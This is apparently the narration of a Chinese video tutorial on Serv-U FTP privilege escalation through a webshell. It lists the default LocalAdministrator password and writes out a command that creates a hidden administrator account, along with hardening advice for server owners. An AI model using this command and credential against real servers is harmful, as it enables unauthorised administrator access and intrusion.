下面动画开始,准备好一个WEBSHELLL,下面我就以我的服务器为例。
现在我们登陆我们的WEBSHELL,来演示。
在这里需要给大家介绍一下,老手可以跳过,#l@$ak#.lk;0@P 默认安装的SERV-FTP,密码:#l@$ak#.lk;0@P。大家一定要注意修改。
我们看一下更改后,是否可以提权。
大家注意一下,是没有这个帐户: user13$
下面我们试一下,更改后的密码是否可以提权。我们打开远程登陆看一下,大家看到了吧,可以提权的,所以大家一定不要忽略。
Serv-U的密码更改很简单,如果是默认安装,旧密码可以为空,直接填写新密码就OK
为了安全,建议在安装Serv-U时,不要安装默认目录。以免造不必要的问题出现。
如果想查看密码,你可以打开ServUDaemon.exe 这个文件
cmd /c net user user13$ pass13 /add & net localgroup administrators user13$ /add
查找密码:#l@$ak#.lk;0@P
#l@$ak#.lk;0@P 密码 LocalAdministrat 账号
更改后保存OK
收集资料:
(另外注意设置Serv-U所在的文件夹的权限,不要让IIS匿名用户有读取的权限,否则人家下走你修改过的文件,照样可以分析出你的管理员名和密码)
其实,注销了Shell组件之后,侵入者运行提升工具的可能性就很小了,但是prel等别的脚本语言也有shell能力,为防万一,还是设置一下为好。
Ultraedit 用到软件,大家自己去网上下载吧。
时间以很晚了,动画就到此结束了。
希望今天的动画可以为大家带来帮助。请不要用于非法!
ctrl+F